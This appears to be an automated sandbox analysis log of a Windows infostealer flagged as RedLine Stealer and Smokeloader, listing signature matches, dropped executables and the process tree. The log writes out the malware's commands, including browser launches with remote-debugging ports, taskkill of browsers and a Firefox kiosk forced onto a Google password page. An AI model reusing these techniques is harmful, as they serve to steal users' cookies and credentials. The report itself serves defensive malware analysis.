Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 00D480C0 appears 260 times
Source: C:\Users\user\Documents\JKECGDBFCB.exe Code function: String function: 005280C0 appears 130 times
Source: random[1].exe0.17.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: 2533b4b8c7.exe.17.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: file.exe, 00000000.00000002.2619264905.000000006C755000.00000002.00000001.01000000.00000009.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2618781596.000000006C562000.00000002.00000001.01000000.0000000A.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2614456358.000000000B7C2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exe.MUIj% vs file.exe
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 00000012.00000002.3325152088.0000000000F4C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000012.00000002.3323737933.0000000000D70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: file.exe Static PE information: Section: loxwmvpm ZLIB complexity 0.9947971873107208
Source: random[1].exe.17.dr Static PE information: Section: loxwmvpm ZLIB complexity 0.9947971873107208
Source: 815f2a8fe8.exe.17.dr Static PE information: Section: loxwmvpm ZLIB complexity 0.9947971873107208
Source: random[1].exe1.17.dr Static PE information: Section: ZLIB complexity 0.9975129757785467
Source: random[1].exe1.17.dr Static PE information: Section: kcjzlwkt ZLIB complexity 0.9946914618549823
Source: feb3d39b6a.exe.17.dr Static PE information: Section: ZLIB complexity 0.9975129757785467
Source: feb3d39b6a.exe.17.dr Static PE information: Section: kcjzlwkt ZLIB complexity 0.9946914618549823
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@81/79@50/17
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C537030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 0_2_6C537030
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\MO0A388L.htm Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5356:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6432:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5820:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7220:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1268:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7152:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5852:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Users\user\Documents\JKECGDBFCB.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985 Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: file.exe, 00000000.00000002.2619103776.000000006C70F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2611716092.000000000566C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2618267474.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: file.exe, 00000000.00000002.2619103776.000000006C70F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2611716092.000000000566C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2618267474.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.2619103776.000000006C70F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2611716092.000000000566C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2618267474.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.2619103776.000000006C70F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2611716092.000000000566C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2618267474.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: file.exe, 00000000.00000002.2619103776.000000006C70F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2611716092.000000000566C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2618267474.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2619103776.000000006C70F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2611716092.000000000566C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2618267474.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: file.exe, 00000000.00000002.2611716092.000000000566C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2618267474.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000003.2362973494.0000000005549000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2225538035.0000000005555000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.2978944950.0000000005603000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.2954831207.00000000055F4000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.2955299029.00000000055D5000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3123638554.0000000005675000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3181790785.000000000568D000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3122063165.0000000005694000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.2611716092.000000000566C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2618267474.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: file.exe, 00000000.00000002.2611716092.000000000566C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2618267474.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: file.exe ReversingLabs: Detection: 44%
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=2188,i,15960118764886269658,6532933888206594195,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2456 --field-trial-handle=2064,i,2810652409012286938,13931137755931519812,262144 /prefetch:3
Source: unknown Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2276 --field-trial-handle=2124,i,13202406823747030599,15920737629403327339,262144 /prefetch:3
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\JKECGDBFCB.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\Documents\JKECGDBFCB.exe "C:\Users\user\Documents\JKECGDBFCB.exe"
Source: C:\Users\user\Documents\JKECGDBFCB.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe "C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe "C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe "C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe "C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe "C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe"
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: unknown Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2192 -parentBuildID 20230927232528 -prefsHandle 2132 -prefMapHandle 2128 -prefsLen 25308 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9f89380b-e895-40d1-9424-18fcfa5174fc} 1992 "\\.\pipe\gecko-crash-server-pipe.1992" 132aa86e310 socket
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe "C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe "C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4400 -parentBuildID 20230927232528 -prefsHandle 3648 -prefMapHandle 3968 -prefsLen 30974 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e2f51042-99a7-4863-8fea-e445d15025a5} 1992 "\\.\pipe\gecko-crash-server-pipe.1992" 132bd2afe10 rdd
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe "C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe"
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe "C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\JKECGDBFCB.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=2188,i,15960118764886269658,6532933888206594195,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Users\user\Documents\JKECGDBFCB.exe "C:\Users\user\Documents\JKECGDBFCB.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2456 --field-trial-handle=2064,i,2810652409012286938,13931137755931519812,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2276 --field-trial-handle=2124,i,13202406823747030599,15920737629403327339,262144 /prefetch:3
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\Documents\JKECGDBFCB.exe "C:\Users\user\Documents\JKECGDBFCB.exe"
Source: C:\Users\user\Documents\JKECGDBFCB.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe "C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe "C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe "C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe "C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe "C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe"
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2192 -parentBuildID 20230927232528 -prefsHandle 2132 -prefMapHandle 2128 -prefsLen 25308 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9f89380b-e895-40d1-9424-18fcfa5174fc} 1992 "\\.\pipe\gecko-crash-server-pipe.1992" 132aa86e310 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4400 -parentBuildID 20230927232528 -prefsHandle 3648 -prefMapHandle 3968 -prefsLen 30974 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e2f51042-99a7-4863-8fea-e445d15025a5} 1992 "\\.\pipe\gecko-crash-server-pipe.1992" 132bd2afe10 rdd
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mozglue.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: msvcp140.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: pcacli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: apphelp.dll
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: winmm.dll
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: wininet.dll
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: sspicli.dll
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: mstask.dll
